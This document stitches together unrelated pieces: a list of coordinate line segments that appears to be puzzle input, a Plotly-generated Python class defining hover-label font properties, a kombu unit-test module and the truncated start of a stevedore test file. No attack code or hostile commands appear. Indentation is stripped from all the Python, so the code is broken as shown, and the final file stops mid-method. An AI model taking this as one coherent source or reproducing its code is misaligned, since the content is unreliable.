16,12 -> 982,978
31,348 -> 320,348
54,975 -> 947,82
844,714 -> 870,714
677,965 -> 677,699
387,699 -> 387,26
329,479 -> 189,479
970,708 -> 538,708
565,434 -> 565,623
748,737 -> 748,497
255,984 -> 255,600
146,59 -> 932,845
191,929 -> 423,929
316,409 -> 802,409
208,560 -> 559,209
885,237 -> 135,987
477,486 -> 260,486
845,59 -> 845,811
225,369 -> 162,369
858,678 -> 858,362
162,972 -> 27,972
828,26 -> 283,571
670,48 -> 114,604
732,487 -> 620,487
570,575 -> 14,19
113,203 -> 162,154
374,702 -> 374,452
850,575 -> 535,575
841,133 -> 841,474
976,960 -> 642,960
177,428 -> 177,246
969,289 -> 589,289
787,842 -> 731,786
743,709 -> 336,709
15,914 -> 299,630
863,952 -> 17,952
586,889 -> 586,512
442,128 -> 436,128
633,367 -> 79,921
21,990 -> 257,990
829,297 -> 829,103
975,633 -> 879,633
946,887 -> 72,13
531,720 -> 123,312
84,954 -> 815,223
989,982 -> 257,982
669,417 -> 928,158
128,935 -> 87,976
692,850 -> 191,850
686,856 -> 686,259
135,396 -> 473,58
837,206 -> 629,206
751,227 -> 751,900
190,617 -> 190,502
850,265 -> 254,265
229,587 -> 325,491
980,747 -> 465,232
54,375 -> 439,375
737,844 -> 711,844
533,219 -> 123,629
232,805 -> 232,798
911,441 -> 911,160
80,294 -> 80,527
880,533 -> 590,533
674,84 -> 674,670
956,440 -> 554,842
24,939 -> 890,73
516,183 -> 145,554
71,584 -> 71,766
629,173 -> 643,187
34,360 -> 639,965
983,871 -> 983,682
986,590 -> 986,327
769,986 -> 130,986
392,192 -> 70,192
577,379 -> 635,379
243,664 -> 162,664
273,987 -> 273,192
251,548 -> 558,855
989,736 -> 989,611
400,697 -> 134,431
646,923 -> 646,841
768,782 -> 386,782
93,973 -> 939,127
489,91 -> 489,551
313,683 -> 248,748
986,61 -> 201,846
322,413 -> 737,413
567,716 -> 567,614
198,624 -> 439,624
402,198 -> 147,453
897,352 -> 897,298
773,379 -> 773,19
373,256 -> 931,814
690,796 -> 543,796
884,368 -> 464,368
136,864 -> 622,378
458,569 -> 458,254
491,462 -> 491,412
558,340 -> 73,340
980,52 -> 980,605
126,609 -> 390,345
437,659 -> 17,659
53,928 -> 982,928
389,591 -> 389,832
464,46 -> 464,754
646,680 -> 646,988
919,159 -> 109,969
334,75 -> 219,75
976,639 -> 976,685
264,773 -> 128,773
787,771 -> 699,771
415,124 -> 549,124
468,71 -> 468,701
815,121 -> 797,121
619,95 -> 610,104
886,294 -> 120,294
148,136 -> 148,314
816,971 -> 454,971
888,733 -> 431,733
59,836 -> 840,55
52,965 -> 962,55
989,982 -> 19,12
697,818 -> 185,306
883,638 -> 481,638
429,285 -> 170,26
516,507 -> 516,301
767,102 -> 61,808
764,793 -> 209,238
568,411 -> 261,718
706,622 -> 685,622
226,110 -> 790,674
544,429 -> 544,334
794,588 -> 794,792
804,738 -> 782,738
370,552 -> 370,189
960,275 -> 644,275
133,896 -> 686,896
12,986 -> 987,11
978,973 -> 69,64
92,465 -> 62,465
733,57 -> 18,57
110,845 -> 110,272
123,935 -> 123,499
37,960 -> 986,11
332,209 -> 344,221
237,279 -> 349,279
875,635 -> 875,420
552,174 -> 552,635
10,93 -> 853,936
909,82 -> 909,926
511,743 -> 511,830
223,974 -> 223,124
829,543 -> 11,543
307,671 -> 206,570
126,72 -> 956,72
528,903 -> 528,223
644,524 -> 952,216
734,324 -> 734,105
225,558 -> 225,159
667,122 -> 667,64
582,93 -> 582,509
817,932 -> 727,932
898,18 -> 79,837
12,987 -> 986,13
426,79 -> 722,79
496,884 -> 906,884
953,183 -> 953,508
360,881 -> 975,881
765,862 -> 579,862
14,55 -> 14,560
454,333 -> 290,333
19,479 -> 91,551
696,41 -> 56,41
329,203 -> 812,203
498,559 -> 498,636
822,852 -> 614,852
410,370 -> 410,624
829,415 -> 805,415
775,980 -> 204,980
705,780 -> 116,191
49,30 -> 988,969
324,199 -> 554,199
727,572 -> 157,572
212,693 -> 93,693
886,105 -> 152,105
239,834 -> 958,115
623,920 -> 623,523
389,225 -> 106,508
443,426 -> 443,108
129,770 -> 858,41
906,559 -> 392,559
44,793 -> 774,793
693,275 -> 693,738
623,434 -> 184,873
774,623 -> 774,895
140,187 -> 140,238
247,503 -> 45,301
575,365 -> 950,365
101,120 -> 646,120
42,682 -> 649,75
749,767 -> 516,534
551,53 -> 73,531
15,26 -> 885,896
749,15 -> 235,529
548,169 -> 784,405
458,564 -> 962,564
663,873 -> 678,873
349,773 -> 349,927
777,180 -> 637,320
238,306 -> 844,912
927,818 -> 652,543
404,673 -> 952,125
750,297 -> 18,297
926,958 -> 926,669
767,843 -> 767,833
151,136 -> 234,219
927,789 -> 468,330
593,361 -> 593,447
48,14 -> 954,920
282,972 -> 790,972
537,446 -> 202,446
847,125 -> 357,615
667,609 -> 299,609
820,987 -> 359,987
342,889 -> 595,889
692,414 -> 239,414
916,935 -> 70,89
289,884 -> 289,790
264,562 -> 373,562
850,24 -> 126,748
877,159 -> 213,823
702,607 -> 702,454
432,883 -> 432,260
530,387 -> 229,387
783,39 -> 783,933
757,775 -> 757,81
416,376 -> 474,376
220,462 -> 220,824
438,317 -> 421,317
403,312 -> 866,312
902,923 -> 204,923
345,33 -> 819,33
376,521 -> 549,521
172,320 -> 129,277
25,975 -> 976,24
730,108 -> 465,373
607,468 -> 737,598
376,55 -> 672,55
807,113 -> 974,113
345,804 -> 695,454
687,921 -> 650,884
262,743 -> 262,753
889,734 -> 499,344
424,727 -> 909,242
100,957 -> 100,832
558,958 -> 376,958
422,473 -> 539,356
424,463 -> 158,463
329,543 -> 816,543
300,74 -> 362,136
620,691 -> 620,312
215,727 -> 360,582
692,116 -> 618,116
945,722 -> 945,560
851,83 -> 450,484
692,424 -> 254,862
160,214 -> 160,405
937,101 -> 854,184
989,14 -> 18,985
256,275 -> 828,847
797,748 -> 509,748
521,148 -> 422,148
85,549 -> 85,807
689,688 -> 443,442
750,664 -> 648,562
51,616 -> 51,54
925,272 -> 925,696
284,560 -> 369,560
509,685 -> 509,559
985,157 -> 273,869
570,765 -> 614,721
62,981 -> 985,58
289,496 -> 289,104
752,232 -> 692,292
82,948 -> 683,948
15,20 -> 984,989
252,950 -> 252,132
930,659 -> 614,659
552,449 -> 798,695
850,894 -> 342,386
412,465 -> 412,383
249,616 -> 351,718
759,289 -> 613,289
673,347 -> 673,842
749,493 -> 449,493
378,468 -> 378,674
914,924 -> 890,900
514,56 -> 606,56
855,233 -> 979,233
170,756 -> 170,961
450,601 -> 450,87
868,192 -> 125,935
702,137 -> 231,608
109,36 -> 632,36
511,472 -> 511,945
208,884 -> 923,169
831,66 -> 146,66
435,133 -> 884,133
900,418 -> 916,418
957,104 -> 127,104
608,892 -> 608,40
554,782 -> 55,782
305,260 -> 305,712
942,143 -> 226,859
823,778 -> 317,778
228,415 -> 228,445
313,505 -> 669,505
43,539 -> 43,187
14,84 -> 743,813
687,101 -> 277,101
549,977 -> 549,392
21,637 -> 214,637
950,961 -> 104,115
778,831 -> 958,831
214,765 -> 579,765
586,42 -> 89,42
505,950 -> 505,115
144,734 -> 144,813
11,349 -> 11,681
49,336 -> 99,386
560,187 -> 560,551
678,602 -> 761,519
131,515 -> 411,795
957,835 -> 957,106
948,852 -> 948,990
541,946 -> 541,405
355,147 -> 724,516
644,476 -> 625,476
789,818 -> 207,236
259,57 -> 431,57
441,375 -> 441,34
774,121 -> 882,13
655,397 -> 188,864
467,432 -> 235,200
268,121 -> 268,842
975,14 -> 11,978
124,904 -> 935,93
401,582 -> 420,582
170,700 -> 523,347
20,681 -> 20,174
420,939 -> 173,692
61,933 -> 956,38
686,458 -> 686,939
780,561 -> 305,86
792,644 -> 792,780
632,550 -> 938,550
441,252 -> 841,252
789,59 -> 789,418
981,11 -> 278,714
264,41 -> 264,186
870,833 -> 605,568
160,905 -> 160,783
385,191 -> 385,403
774,791 -> 69,86
409,967 -> 409,173
868,41 -> 868,235
536,497 -> 949,497
757,119 -> 156,720
563,706 -> 883,706
124,482 -> 14,482
353,655 -> 904,104
194,868 -> 194,649
810,736 -> 748,736
815,578 -> 50,578
531,131 -> 241,131
18,972 -> 977,13
761,747 -> 73,59
650,701 -> 930,701
470,237 -> 470,740
333,803 -> 954,182
644,667 -> 235,667
943,766 -> 299,766
985,876 -> 985,503
170,924 -> 467,924
249,19 -> 981,751
462,666 -> 462,651
404,228 -> 877,228
174,440 -> 174,847
910,596 -> 672,596
430,663 -> 734,663
711,294 -> 69,294
193,302 -> 257,302
959,20 -> 13,966
171,561 -> 171,953
704,986 -> 29,311
285,886 -> 285,260
945,872 -> 531,458
265,748 -> 478,748
26,537 -> 26,851
205,210 -> 917,922
590,488 -> 241,139
536,179 -> 247,179
|
|
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Font(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "box.hoverlabel"
_path_str = "box.hoverlabel.font"
_valid_props = {"color", "colorsrc", "family", "familysrc", "size", "sizesrc"}
# color
# -----
@property
def color(self):
"""
The 'color' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
# colorsrc
# --------
@property
def colorsrc(self):
"""
Sets the source reference on Chart Studio Cloud for `color`.
The 'colorsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["colorsrc"]
@colorsrc.setter
def colorsrc(self, val):
self["colorsrc"] = val
# family
# ------
@property
def family(self):
"""
HTML font family - the typeface that will be applied by the web
browser. The web browser will only be able to apply a font if
it is available on the system which it operates. Provide
multiple font families, separated by commas, to indicate the
preference in which to apply fonts if they aren't available on
the system. The Chart Studio Cloud (at https://chart-
studio.plotly.com or on-premise) generates images on a server,
where only a select number of fonts are installed and
supported. These include "Arial", "Balto", "Courier New",
"Droid Sans",, "Droid Serif", "Droid Sans Mono", "Gravitas
One", "Old Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
The 'family' property is a string and must be specified as:
- A non-empty string
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
str|numpy.ndarray
"""
return self["family"]
@family.setter
def family(self, val):
self["family"] = val
# familysrc
# ---------
@property
def familysrc(self):
"""
Sets the source reference on Chart Studio Cloud for `family`.
The 'familysrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["familysrc"]
@familysrc.setter
def familysrc(self, val):
self["familysrc"] = val
# size
# ----
@property
def size(self):
"""
The 'size' property is a number and may be specified as:
- An int or float in the interval [1, inf]
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
int|float|numpy.ndarray
"""
return self["size"]
@size.setter
def size(self, val):
self["size"] = val
# sizesrc
# -------
@property
def sizesrc(self):
"""
Sets the source reference on Chart Studio Cloud for `size`.
The 'sizesrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["sizesrc"]
@sizesrc.setter
def sizesrc(self, val):
self["sizesrc"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
color
colorsrc
Sets the source reference on Chart Studio Cloud for
`color`.
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The Chart
Studio Cloud (at https://chart-studio.plotly.com or on-
premise) generates images on a server, where only a
select number of fonts are installed and supported.
These include "Arial", "Balto", "Courier New", "Droid
Sans",, "Droid Serif", "Droid Sans Mono", "Gravitas
One", "Old Standard TT", "Open Sans", "Overpass", "PT
Sans Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on Chart Studio Cloud for
`family`.
size
sizesrc
Sets the source reference on Chart Studio Cloud for
`size`.
"""
def __init__(
self,
arg=None,
color=None,
colorsrc=None,
family=None,
familysrc=None,
size=None,
sizesrc=None,
**kwargs
):
"""
Construct a new Font object
Sets the font used in hover labels.
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`plotly.graph_objs.box.hoverlabel.Font`
color
colorsrc
Sets the source reference on Chart Studio Cloud for
`color`.
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The Chart
Studio Cloud (at https://chart-studio.plotly.com or on-
premise) generates images on a server, where only a
select number of fonts are installed and supported.
These include "Arial", "Balto", "Courier New", "Droid
Sans",, "Droid Serif", "Droid Sans Mono", "Gravitas
One", "Old Standard TT", "Open Sans", "Overpass", "PT
Sans Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on Chart Studio Cloud for
`family`.
size
sizesrc
Sets the source reference on Chart Studio Cloud for
`size`.
Returns
-------
Font
"""
super(Font, self).__init__("font")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.box.hoverlabel.Font
constructor must be a dict or
an instance of :class:`plotly.graph_objs.box.hoverlabel.Font`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("color", None)
_v = color if color is not None else _v
if _v is not None:
self["color"] = _v
_v = arg.pop("colorsrc", None)
_v = colorsrc if colorsrc is not None else _v
if _v is not None:
self["colorsrc"] = _v
_v = arg.pop("family", None)
_v = family if family is not None else _v
if _v is not None:
self["family"] = _v
_v = arg.pop("familysrc", None)
_v = familysrc if familysrc is not None else _v
if _v is not None:
self["familysrc"] = _v
_v = arg.pop("size", None)
_v = size if size is not None else _v
if _v is not None:
self["size"] = _v
_v = arg.pop("sizesrc", None)
_v = sizesrc if sizesrc is not None else _v
if _v is not None:
self["sizesrc"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
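# Illustrative usage sketch (not part of the generated module; assumes plotly is installed
# and uses the public graph_objects API rather than this class directly):
# import plotly.graph_objects as go
# fig = go.Figure(go.Box(y=[1, 2, 3]))
# fig.update_traces(hoverlabel=dict(font=dict(family="Arial", size=14, color="#444")))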
|
|
import pytest
import socket
from amqp import RecoverableConnectionError
from unittest.mock import Mock, patch
from case import ContextMock
from kombu import common
from kombu.common import (
Broadcast, maybe_declare,
send_reply, collect_replies,
declaration_cached, ignore_errors,
QoS, PREFETCH_COUNT_MAX, generate_oid
)
from t.mocks import MockPool
def test_generate_oid():
from uuid import NAMESPACE_OID
instance = Mock()
args = (1, 1001, 2001, id(instance))
ent = '%x-%x-%x-%x' % args
with patch('kombu.common.uuid3') as mock_uuid3, \
patch('kombu.common.uuid5') as mock_uuid5:
mock_uuid3.side_effect = ValueError
mock_uuid3.return_value = 'uuid3-6ba7b812-9dad-11d1-80b4'
mock_uuid5.return_value = 'uuid5-6ba7b812-9dad-11d1-80b4'
oid = generate_oid(1, 1001, 2001, instance)
mock_uuid5.assert_called_once_with(NAMESPACE_OID, ent)
assert oid == 'uuid5-6ba7b812-9dad-11d1-80b4'
def test_ignore_errors():
connection = Mock()
connection.channel_errors = (KeyError,)
connection.connection_errors = (KeyError,)
with ignore_errors(connection):
raise KeyError()
def raising():
raise KeyError()
ignore_errors(connection, raising)
connection.channel_errors = connection.connection_errors = ()
with pytest.raises(KeyError):
with ignore_errors(connection):
raise KeyError()
class test_declaration_cached:
def test_when_cached(self):
chan = Mock()
chan.connection.client.declared_entities = ['foo']
assert declaration_cached('foo', chan)
def test_when_not_cached(self):
chan = Mock()
chan.connection.client.declared_entities = ['bar']
assert not declaration_cached('foo', chan)
class test_Broadcast:
def test_arguments(self):
with patch('kombu.common.uuid',
return_value='test') as uuid_mock:
q = Broadcast(name='test_Broadcast')
uuid_mock.assert_called_with()
assert q.name == 'bcast.test'
assert q.alias == 'test_Broadcast'
assert q.auto_delete
assert q.exchange.name == 'test_Broadcast'
assert q.exchange.type == 'fanout'
q = Broadcast('test_Broadcast', 'explicit_queue_name')
assert q.name == 'explicit_queue_name'
assert q.exchange.name == 'test_Broadcast'
q2 = q(Mock())
assert q2.name == q.name
with patch('kombu.common.uuid',
return_value='test') as uuid_mock:
q = Broadcast('test_Broadcast',
'explicit_queue_name',
unique=True)
uuid_mock.assert_called_with()
assert q.name == 'explicit_queue_name.test'
q2 = q(Mock())
assert q2.name.split('.')[0] == q.name.split('.')[0]
class test_maybe_declare:
def _get_mock_channel(self):
# Given: A mock Channel with mock'd connection/client/entities
channel = Mock()
channel.connection.client.declared_entities = set()
return channel
def _get_mock_entity(self, is_bound=False, can_cache_declaration=True):
# Given: Unbound mock Entity (will bind to channel when bind called
entity = Mock()
entity.can_cache_declaration = can_cache_declaration
entity.is_bound = is_bound
def _bind_entity(channel):
entity.channel = channel
entity.is_bound = True
return entity
entity.bind = _bind_entity
return entity
def test_cacheable(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is already bound
entity = self._get_mock_entity(
is_bound=True, can_cache_declaration=True)
entity.channel = channel
entity.auto_delete = False
assert entity.is_bound, "Expected entity is bound to begin this test."
# When: Calling maybe_declare default
maybe_declare(entity, channel)
# Then: It called declare on the entity queue and added it to list
assert entity.declare.call_count == 1
assert hash(entity) in channel.connection.client.declared_entities
# When: Calling maybe_declare default (again)
maybe_declare(entity, channel)
# Then: we did not call declare again because its already in our list
assert entity.declare.call_count == 1
# When: Entity channel connection has gone away
entity.channel.connection = None
# Then: maybe_declare must raise a RecoverableConnectionError
with pytest.raises(RecoverableConnectionError):
maybe_declare(entity)
def test_binds_entities(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is not bound
entity = self._get_mock_entity()
assert not entity.is_bound, "Expected entity unbound to begin test."
# When: calling maybe_declare with default of no retry policy
maybe_declare(entity, channel)
# Then: the entity is now bound because it called to bind it
assert entity.is_bound is True, "Expected entity is now marked bound."
def test_binds_entities_when_retry_policy(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is not bound
entity = self._get_mock_entity()
assert not entity.is_bound, "Expected entity unbound to begin test."
# Given: A retry policy
sample_retry_policy = {
'interval_start': 0,
'interval_max': 1,
'max_retries': 3,
'interval_step': 0.2,
'errback': lambda x: "Called test errback retry policy",
}
# When: calling maybe_declare with retry enabled
maybe_declare(entity, channel, retry=True, **sample_retry_policy)
# Then: the entity is now bound because it called to bind it
assert entity.is_bound is True, "Expected entity is now marked bound."
def test_with_retry(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is already bound
entity = self._get_mock_entity(
is_bound=True, can_cache_declaration=True)
entity.channel = channel
assert entity.is_bound, "Expected entity is bound to begin this test."
# When calling maybe_declare with retry enabled (default policy)
maybe_declare(entity, channel, retry=True)
# Then: the connection client used ensure to ensure the retry policy
assert channel.connection.client.ensure.call_count
def test_with_retry_dropped_connection(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is already bound
entity = self._get_mock_entity(
is_bound=True, can_cache_declaration=True)
entity.channel = channel
assert entity.is_bound, "Expected entity is bound to begin this test."
# When: Entity channel connection has gone away
entity.channel.connection = None
# When: calling maybe_declare with retry
# Then: the RecoverableConnectionError should be raised
with pytest.raises(RecoverableConnectionError):
maybe_declare(entity, channel, retry=True)
class test_replies:
def test_send_reply(self):
req = Mock()
req.content_type = 'application/json'
req.content_encoding = 'binary'
req.properties = {'reply_to': 'hello',
'correlation_id': 'world'}
channel = Mock()
exchange = Mock()
exchange.is_bound = True
exchange.channel = channel
producer = Mock()
producer.channel = channel
producer.channel.connection.client.declared_entities = set()
send_reply(exchange, req, {'hello': 'world'}, producer)
assert producer.publish.call_count
args = producer.publish.call_args
assert args[0][0] == {'hello': 'world'}
assert args[1] == {
'exchange': exchange,
'routing_key': 'hello',
'correlation_id': 'world',
'serializer': 'json',
'retry': False,
'retry_policy': None,
'content_encoding': 'binary',
}
@patch('kombu.common.itermessages')
def test_collect_replies_with_ack(self, itermessages):
conn, channel, queue = Mock(), Mock(), Mock()
body, message = Mock(), Mock()
itermessages.return_value = [(body, message)]
it = collect_replies(conn, channel, queue, no_ack=False)
m = next(it)
assert m is body
itermessages.assert_called_with(conn, channel, queue, no_ack=False)
message.ack.assert_called_with()
with pytest.raises(StopIteration):
next(it)
channel.after_reply_message_received.assert_called_with(queue.name)
@patch('kombu.common.itermessages')
def test_collect_replies_no_ack(self, itermessages):
conn, channel, queue = Mock(), Mock(), Mock()
body, message = Mock(), Mock()
itermessages.return_value = [(body, message)]
it = collect_replies(conn, channel, queue)
m = next(it)
assert m is body
itermessages.assert_called_with(conn, channel, queue, no_ack=True)
message.ack.assert_not_called()
@patch('kombu.common.itermessages')
def test_collect_replies_no_replies(self, itermessages):
conn, channel, queue = Mock(), Mock(), Mock()
itermessages.return_value = []
it = collect_replies(conn, channel, queue)
with pytest.raises(StopIteration):
next(it)
channel.after_reply_message_received.assert_not_called()
class test_insured:
@patch('kombu.common.logger')
def test_ensure_errback(self, logger):
common._ensure_errback('foo', 30)
logger.error.assert_called()
def test_revive_connection(self):
on_revive = Mock()
channel = Mock()
common.revive_connection(Mock(), channel, on_revive)
on_revive.assert_called_with(channel)
common.revive_connection(Mock(), channel, None)
def get_insured_mocks(self, insured_returns=('works', 'ignored')):
conn = ContextMock()
pool = MockPool(conn)
fun = Mock()
insured = conn.autoretry.return_value = Mock()
insured.return_value = insured_returns
return conn, pool, fun, insured
def test_insured(self):
conn, pool, fun, insured = self.get_insured_mocks()
ret = common.insured(pool, fun, (2, 2), {'foo': 'bar'})
assert ret == 'works'
conn.ensure_connection.assert_called_with(
errback=common._ensure_errback,
)
insured.assert_called()
i_args, i_kwargs = insured.call_args
assert i_args == (2, 2)
assert i_kwargs == {'foo': 'bar', 'connection': conn}
conn.autoretry.assert_called()
ar_args, ar_kwargs = conn.autoretry.call_args
assert ar_args == (fun, conn.default_channel)
assert ar_kwargs.get('on_revive')
assert ar_kwargs.get('errback')
def test_insured_custom_errback(self):
conn, pool, fun, insured = self.get_insured_mocks()
custom_errback = Mock()
common.insured(pool, fun, (2, 2), {'foo': 'bar'},
errback=custom_errback)
conn.ensure_connection.assert_called_with(errback=custom_errback)
class MockConsumer:
consumers = set()
def __init__(self, channel, queues=None, callbacks=None, **kwargs):
self.channel = channel
self.queues = queues
self.callbacks = callbacks
def __enter__(self):
self.consumers.add(self)
return self
def __exit__(self, *exc_info):
self.consumers.discard(self)
class test_itermessages:
class MockConnection:
should_raise_timeout = False
def drain_events(self, **kwargs):
if self.should_raise_timeout:
raise socket.timeout()
for consumer in MockConsumer.consumers:
for callback in consumer.callbacks:
callback('body', 'message')
def test_default(self):
conn = self.MockConnection()
channel = Mock()
channel.connection.client = conn
conn.Consumer = MockConsumer
it = common.itermessages(conn, channel, 'q', limit=1)
ret = next(it)
assert ret == ('body', 'message')
with pytest.raises(StopIteration):
next(it)
def test_when_raises_socket_timeout(self):
conn = self.MockConnection()
conn.should_raise_timeout = True
channel = Mock()
channel.connection.client = conn
conn.Consumer = MockConsumer
it = common.itermessages(conn, channel, 'q', limit=1)
with pytest.raises(StopIteration):
next(it)
@patch('kombu.common.deque')
def test_when_raises_IndexError(self, deque):
deque_instance = deque.return_value = Mock()
deque_instance.popleft.side_effect = IndexError()
conn = self.MockConnection()
channel = Mock()
conn.Consumer = MockConsumer
it = common.itermessages(conn, channel, 'q', limit=1)
with pytest.raises(StopIteration):
next(it)
class test_QoS:
class _QoS(QoS):
def __init__(self, value):
self.value = value
QoS.__init__(self, None, value)
def set(self, value):
return value
def test_qos_exceeds_16bit(self):
with patch('kombu.common.logger') as logger:
callback = Mock()
qos = QoS(callback, 10)
qos.prev = 100
# cannot use 2 ** 32 because of a bug on macOS Py2.5:
# https://jira.mongodb.org/browse/PYTHON-389
qos.set(4294967296)
logger.warning.assert_called()
callback.assert_called_with(prefetch_count=0)
def test_qos_increment_decrement(self):
qos = self._QoS(10)
assert qos.increment_eventually() == 11
assert qos.increment_eventually(3) == 14
assert qos.increment_eventually(-30) == 14
assert qos.decrement_eventually(7) == 7
assert qos.decrement_eventually() == 6
def test_qos_disabled_increment_decrement(self):
qos = self._QoS(0)
assert qos.increment_eventually() == 0
assert qos.increment_eventually(3) == 0
assert qos.increment_eventually(-30) == 0
assert qos.decrement_eventually(7) == 0
assert qos.decrement_eventually() == 0
assert qos.decrement_eventually(10) == 0
def test_qos_thread_safe(self):
qos = self._QoS(10)
def add():
for i in range(1000):
qos.increment_eventually()
def sub():
for i in range(1000):
qos.decrement_eventually()
def threaded(funs):
from threading import Thread
threads = [Thread(target=fun) for fun in funs]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
threaded([add, add])
assert qos.value == 2010
qos.value = 1000
threaded([add, sub]) # n = 2
assert qos.value == 1000
def test_exceeds_short(self):
qos = QoS(Mock(), PREFETCH_COUNT_MAX - 1)
qos.update()
assert qos.value == PREFETCH_COUNT_MAX - 1
qos.increment_eventually()
assert qos.value == PREFETCH_COUNT_MAX
qos.increment_eventually()
assert qos.value == PREFETCH_COUNT_MAX + 1
qos.decrement_eventually()
assert qos.value == PREFETCH_COUNT_MAX
qos.decrement_eventually()
assert qos.value == PREFETCH_COUNT_MAX - 1
def test_consumer_increment_decrement(self):
mconsumer = Mock()
qos = QoS(mconsumer.qos, 10)
qos.update()
assert qos.value == 10
mconsumer.qos.assert_called_with(prefetch_count=10)
qos.decrement_eventually()
qos.update()
assert qos.value == 9
mconsumer.qos.assert_called_with(prefetch_count=9)
qos.decrement_eventually()
assert qos.value == 8
mconsumer.qos.assert_called_with(prefetch_count=9)
assert {'prefetch_count': 9} in mconsumer.qos.call_args
# Does not decrement 0 value
qos.value = 0
qos.decrement_eventually()
assert qos.value == 0
qos.increment_eventually()
assert qos.value == 0
def test_consumer_decrement_eventually(self):
mconsumer = Mock()
qos = QoS(mconsumer.qos, 10)
qos.decrement_eventually()
assert qos.value == 9
qos.value = 0
qos.decrement_eventually()
assert qos.value == 0
def test_set(self):
mconsumer = Mock()
qos = QoS(mconsumer.qos, 10)
qos.set(12)
assert qos.prev == 12
qos.set(qos.prev)
|
|
from mock import Mock, sentinel
from stevedore import (ExtensionManager, NamedExtensionManager, HookManager,
DriverManager, EnabledExtensionManager)
from stevedore.dispatch import (DispatchExtensionManager,
NameDispatchExtensionManager)
from stevedore.extension import Extension
from stevedore.tests import utils
test_extension = Extension('test_extension', None, None, None)
test_extension2 = Extension('another_one', None, None, None)
mock_entry_point = Mock(module_name='test.extension', attrs=['obj'])
a_driver = Extension('test_driver', mock_entry_point, sentinel.driver_plugin,
sentinel.driver_obj)
# base ExtensionManager
class TestTestManager(utils.TestCase):
def test_instance_should_use_supplied_extensions(self):
extensions = [test_extension, test_extension2]
em = ExtensionManager.make_test_instance(extensions)
self.assertEqual(extensions, em.extensions)
def test_instance_should_have_default_namespace(self):
em = ExtensionManager.make_test_instance([])
self.assertEqual(em.namespace, 'TESTING')
def test_instance_should_use_supplied_namespace(self):
namespace = 'testing.1.2.3'
em = ExtensionManager.make_test_instance([], namespace=namespace)
self.assertEqual(namespace, em.namespace)
def test_extension_name_should_be_listed(self):
em = ExtensionManager.make_test_instance([test_extension])
self.assertIn(test_extension.name, em.names())
def test_iterator_should_yield_extension(self):
em = ExtensionManager.make_test_instance([test_extension])
self.assertEqual(test_extension, next(iter(em)))
def test_manager_should_allow_name_access(self):
em = ExtensionManager.make_test_instance([test_extension])
